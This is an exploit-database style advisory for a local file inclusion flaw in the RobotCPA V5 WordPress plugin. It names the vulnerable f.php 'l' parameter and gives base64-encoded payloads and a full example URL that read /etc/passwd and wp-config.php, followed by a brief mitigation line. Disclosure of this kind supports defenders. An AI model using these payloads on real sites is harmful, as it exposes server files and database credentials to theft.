vendor:
RobotCPA
by:
T3N38R15
8.8
CVSS
HIGH
Local File Include
98
CWE
Product Name: RobotCPA
Affected Version From: V5
Affected Version To: V5
Patch Exists: NO
Related CWE: N/A
CPE: a:robot-cpa:robotcpa
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2015
WordPress Plugin RobotCPA V5 – Local File Include
The affected file is f.php and the get-parameter 'l' is vulnerable to local file inclusion. We just need to base64 encode our injection, like 'php://filter/resource=./../../../wp-config.php' or 'file:///etc/passwd', and then use it in a URL like 'http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk' to view the content of the passwd file.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in a file path.